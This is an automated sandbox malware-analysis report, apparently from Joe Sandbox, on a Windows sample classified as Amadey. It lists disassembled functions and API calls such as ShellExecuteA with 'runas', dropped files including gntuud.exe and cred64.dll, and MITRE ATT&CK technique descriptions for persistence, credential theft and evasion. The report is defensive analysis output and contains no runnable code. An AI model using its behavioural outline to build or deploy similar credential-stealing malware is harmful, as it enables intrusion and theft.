Instruction Fuzzy Hash: EC114C32200202BAC710267AECC5DEF266997C5778771023BF92A822D2EE6C8CDF411C

Uniqueness

Uniqueness Score: -1.00%

Function 0096ABDE Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 320331af6566cb962ace0647e76be2ad38b69705adbc3407a77f9eddf13dbea2
Instruction ID: f500fcf5c6e7d66b3f11dd94c1eba391ee2760d272d3a9b35996611b70478088
Opcode Fuzzy Hash: 320331af6566cb962ace0647e76be2ad38b69705adbc3407a77f9eddf13dbea2
Instruction Fuzzy Hash: 1711EE31A01621EFC7329B24DD40A5A77AC9F017B0F510531ED96B7290D738DD00DDEA

Uniqueness

Uniqueness Score: -1.00%

Function 0096FB14 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0096FC79,00000000,?,009749A1,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0096FB2A
GetLastError.KERNEL32(?,009749A1,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0096FC79,00000000,00000104,?), ref: 0096FB34
__dosmaperr.LIBCMT ref: 0096FB3B

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: a32e98b3cc518d6611017c09f407fb25a1ea39571fe78292492d3cfee0b11311
Instruction ID: a16b9af80cbdfa9968159f138092475462e6ec4c53a7a8d27bc2b3dd73c6fba0
Opcode Fuzzy Hash: a32e98b3cc518d6611017c09f407fb25a1ea39571fe78292492d3cfee0b11311
Instruction Fuzzy Hash: C0F01D32200115BB8B205BB2ED29D6ABFADFF847A07904531B55DC6421CB35E821DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0096FB7D Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0096FC79,00000000,?,0097492C,00000000,00000000,0096FC79,?,?,00000000,00000000,00000001), ref: 0096FB93
GetLastError.KERNEL32(?,0097492C,00000000,00000000,0096FC79,?,?,00000000,00000000,00000001,00000000,00000000,?,0096FC79,00000000,00000104), ref: 0096FB9D
__dosmaperr.LIBCMT ref: 0096FBA4

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: de22d5bbe60f73852fa7c7c3b833e9708c9e2b0bf73d21007ae8885001f27472
Instruction ID: 641eca0898a8e294607c1749312b53c5de0cd037f275326335e20301cf722a9d
Opcode Fuzzy Hash: de22d5bbe60f73852fa7c7c3b833e9708c9e2b0bf73d21007ae8885001f27472
Instruction Fuzzy Hash: C4F01D36200119BB9B205FF2ED29D6ABFADFF447A03844531F55DC6521DB35E821DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041F8AD Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0041FA12,00000000,?,0042473A,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0041F8C3
GetLastError.KERNEL32(?,0042473A,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0041FA12,00000000,00000104,?), ref: 0041F8CD
__dosmaperr.LIBCMT ref: 0041F8D4

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: a32e98b3cc518d6611017c09f407fb25a1ea39571fe78292492d3cfee0b11311
Instruction ID: 803fc007063167f67073d72d48b77dd8b306300581abe4bc3ca65f7a6a8e9d61
Opcode Fuzzy Hash: a32e98b3cc518d6611017c09f407fb25a1ea39571fe78292492d3cfee0b11311
Instruction Fuzzy Hash: 19F01232700115BB8B206BA6DD0499BBF69FF443A43504536F51DC6121DB35E8A7D7D4

Uniqueness

Uniqueness Score: -1.00%

Function 0041F916 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0041FA12,00000000,?,004246C5,00000000,00000000,0041FA12,?,?,00000000,00000000,00000001), ref: 0041F92C
GetLastError.KERNEL32(?,004246C5,00000000,00000000,0041FA12,?,?,00000000,00000000,00000001,00000000,00000000,?,0041FA12,00000000,00000104), ref: 0041F936
__dosmaperr.LIBCMT ref: 0041F93D

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: de22d5bbe60f73852fa7c7c3b833e9708c9e2b0bf73d21007ae8885001f27472
Instruction ID: 37d27302a1a2eca8b092f01353d8cc03fb9fecfc19a8c04071e9600c3881e131
Opcode Fuzzy Hash: de22d5bbe60f73852fa7c7c3b833e9708c9e2b0bf73d21007ae8885001f27472
Instruction Fuzzy Hash: 66F06271200515BB8B206BA2CD04E97BFA9FF443A03404536F51DC6120CB35E8A7CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 00977626 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00955B07,0000000F,00437A38,00000000,00955B07,?,00976D3E,00955B07,00000001,00955B07,00955B07,?,00974164,00000000,?,00955B07), ref: 0097763D
GetLastError.KERNEL32(?,00976D3E,00955B07,00000001,00955B07,00955B07,?,00974164,00000000,?,00955B07,00000000,00955B07,?,009746B8,00955B07), ref: 00977649

Part of subcall function 0097760F: CloseHandle.KERNEL32(00439900,00977659,?,00976D3E,00955B07,00000001,00955B07,00955B07,?,00974164,00000000,?,00955B07,00000000,00955B07), ref: 0097761F

___initconout.LIBCMT ref: 00977659

Part of subcall function 009775D1: CreateFileW.KERNEL32(004336B8,40000000,00000003,00000000,00000003,00000000,00000000,00977600,00976D2B,00955B07,?,00974164,00000000,?,00955B07,00000000), ref: 009775E4

WriteConsoleW.KERNEL32(00955B07,0000000F,00437A38,00000000,?,00976D3E,00955B07,00000001,00955B07,00955B07,?,00974164,00000000,?,00955B07,00000000), ref: 0097766E

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 654839e4b531a485c8561e35f9c6b1b80fe1c4fa203d6a6e5454fb2027dc39d5
Instruction ID: b5d13b3109236e33a76f77812e94f4066ee426550eac5a386c6793f5f8bcdc3b
Opcode Fuzzy Hash: 654839e4b531a485c8561e35f9c6b1b80fe1c4fa203d6a6e5454fb2027dc39d5
Instruction Fuzzy Hash: 01F01537100118BBCF222FD5DC08E8A7F66FF483B0B818030FA1C85222DA328820DB99

Uniqueness

Uniqueness Score: -1.00%

Function 004273BF Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(004058A0,0000000F,00437A38,00000000,004058A0,?,00426AD7,004058A0,00000001,004058A0,004058A0,?,00423EFD,00000000,?,004058A0), ref: 004273D6
GetLastError.KERNEL32(?,00426AD7,004058A0,00000001,004058A0,004058A0,?,00423EFD,00000000,?,004058A0,00000000,004058A0,?,00424451,004058A0), ref: 004273E2

Part of subcall function 004273A8: CloseHandle.KERNEL32(FFFFFFFE,004273F2,?,00426AD7,004058A0,00000001,004058A0,004058A0,?,00423EFD,00000000,?,004058A0,00000000,004058A0), ref: 004273B8

___initconout.LIBCMT ref: 004273F2

Part of subcall function 0042736A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00427399,00426AC4,004058A0,?,00423EFD,00000000,?,004058A0,00000000), ref: 0042737D

WriteConsoleW.KERNEL32(004058A0,0000000F,00437A38,00000000,?,00426AD7,004058A0,00000001,004058A0,004058A0,?,00423EFD,00000000,?,004058A0,00000000), ref: 00427407

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 654839e4b531a485c8561e35f9c6b1b80fe1c4fa203d6a6e5454fb2027dc39d5
Instruction ID: f4aa61af986e557aabc683dea4287ad527f4dae7078adb09fe65b6480a605f88
Opcode Fuzzy Hash: 654839e4b531a485c8561e35f9c6b1b80fe1c4fa203d6a6e5454fb2027dc39d5
Instruction Fuzzy Hash: 0DF01236200128BBCF222F95EC0598A3F66FF09761B814035FE1885221D6328861DB98

Uniqueness

Uniqueness Score: -1.00%

Function 0096D1CF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe, xrefs: 0096D212, 0096D219, 0096D24F

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
API String ID: 0-628885649
Opcode ID: 4384fd4c7d60fd48786ba2f8ba0e2bbfb8053213faeb400222fc4ced953b2255
Instruction ID: 8602bfdec2ba9931ae491216d2998d162781e25230674f4e1f4563e8e5d98bf1
Opcode Fuzzy Hash: 4384fd4c7d60fd48786ba2f8ba0e2bbfb8053213faeb400222fc4ced953b2255
Instruction Fuzzy Hash: 6C418DB1F01218AFDB21DB99D881EAEBBBCEB85310F14406AF464D7251EB708E40CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041CF68 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe, xrefs: 0041CFAB, 0041CFB2, 0041CFE8

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
API String ID: 0-628885649
Opcode ID: 65df9d79a2b58a2bcb442e045a2e55a5d5cadb832709df36d6bb0dd23eeaec09
Instruction ID: 9698455488551ced2192efa7f0ee548952e5698eb24d3f820b7e273d75b3104a
Opcode Fuzzy Hash: 65df9d79a2b58a2bcb442e045a2e55a5d5cadb832709df36d6bb0dd23eeaec09
Instruction Fuzzy Hash: 0441A2B1E40214AFCB11DF9ADCC1AEFBBB8EB99314F10006BE50597251D7789E82CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00969817 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00969856
__IsNonwritableInCurrentImage.LIBCMT ref: 0096990A

Strings

csm, xrefs: 009698F4

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 6828d5380a72ecfa71335a635a27c0c7d09dca2ea54c9a1ae805d57ddbe0929f
Instruction ID: 3ff39e89a07caf1827aec6e331bab15967e96c99701f8d60efbe86ebf2be6031
Opcode Fuzzy Hash: 6828d5380a72ecfa71335a635a27c0c7d09dca2ea54c9a1ae805d57ddbe0929f
Instruction Fuzzy Hash: 9141D534A00218AFCF10DF68C884AAEBBB9FF85324F148065E815AB352D775DD45CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00954627 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 121COMMON

Download Yara Rule

APIs

ShellExecuteA.SHELL32(00000000,00429928,?,?,00000000,00000000), ref: 009546BB

Strings

+CC, xrefs: 00954680
runas, xrefs: 0095467A

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: +CC$runas
API String ID: 587946157-2150734417
Opcode ID: 7f3ba68d816b0de774c86b4e9781535488c104e7f06803af1df952845e7cbee8
Instruction ID: 800dd56fd9fab4e64c08cb9486bb809f6a8ba5ebcaa4ae827ef1522810a17fab
Opcode Fuzzy Hash: 7f3ba68d816b0de774c86b4e9781535488c104e7f06803af1df952845e7cbee8
Instruction Fuzzy Hash: A541E171600208ABDF08DF69CC92BDE7BA5EB89714F908219FC16472C1C779AA84CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00971792 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 0097153B: GetOEMCP.KERNEL32(00000000,009717AD,0096C1CD,?,?,?,?,?,0096C1CD), ref: 00971566

_free.LIBCMT ref: 0097180A

Strings

c, xrefs: 009718A1

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: _free
String ID: c
API String ID: 269201875-2927717585
Opcode ID: 59700cfabe1b01976d58ff7d39ffcd138362064eb8fa421b8e4a4a61f6cd251d
Instruction ID: 77b542ce73ad1c1387c8e2fe6b16ab784e707b87182c07c573907f2bf8a8c8d0
Opcode Fuzzy Hash: 59700cfabe1b01976d58ff7d39ffcd138362064eb8fa421b8e4a4a61f6cd251d
Instruction Fuzzy Hash: C431AD72900249AFDF01DF6CD881BDA7BF8EF84314F15806AF9189B2A1EB719D50CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0042152B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 004212D4: GetOEMCP.KERNEL32(00000000,00421546,0041BF66,?,?,?,?,?,0041BF66), ref: 004212FF

_free.LIBCMT ref: 004215A3

Strings

c, xrefs: 0042163A

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: _free
String ID: c
API String ID: 269201875-2927717585
Opcode ID: 7332e06fa7ecae4bd4e3249cc5a16ffec72bd8fea6840c43126d62ba3cd34143
Instruction ID: 6a4ff67b76f189842867b9c5836528adc52d8229674c3e5d2b7a30714b2bbc2c
Opcode Fuzzy Hash: 7332e06fa7ecae4bd4e3249cc5a16ffec72bd8fea6840c43126d62ba3cd34143
Instruction Fuzzy Hash: 7431E171A00219AFCB00DF6AD881ADB77F5AF94314F5101ABF802972A1EB79DD91CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00423A09 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041FED4: EnterCriticalSection.KERNEL32(004058A0,?,00424305,004058A0,00437D58,00000010,0041EAF1,00000000,C032C301,0000000F,0000000F,004058A0,?,0041BBFA,004058A0,0000000F), ref: 0041FEEF

FlushFileBuffers.KERNEL32(00000000,00437D38,0000000C,00423B10,NA,?,00000001,?,0041EA4E,?), ref: 00423A52
GetLastError.KERNEL32 ref: 00423A63

Strings

NA, xrefs: 00423A8A

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: BuffersCriticalEnterErrorFileFlushLastSection
String ID: NA
API String ID: 4109680722-827283589
Opcode ID: 602f8a61e0176b0b3c43f70f4b5149247446a1d0a1bb3b3bcfd5d853c74da7d4
Instruction ID: ff259a8a86f6791cd3d56539a9f5b8e5d03a9a6f044a9d5d94d641c3aaafe980
Opcode Fuzzy Hash: 602f8a61e0176b0b3c43f70f4b5149247446a1d0a1bb3b3bcfd5d853c74da7d4
Instruction Fuzzy Hash: D601C072B002108FC710AFA9E84569E7BB1EF48725F50412FF4519B3E2DB7C9942CB58

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Services
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Amadey

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll

C:\Users\user\AppData\Local\Temp\853321935212

C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe

C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Windows Analysis Report
file.exe

Function 0041B9E1 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Function 004043C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 121
COMMON

Function 006E466E Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 004236DF Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Function 0040B3F4 Relevance: 7.8, APIs: 5, Instructions: 312
fileCOMMON

Function 0040B320 Relevance: 3.2, APIs: 2, Instructions: 181
COMMON

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
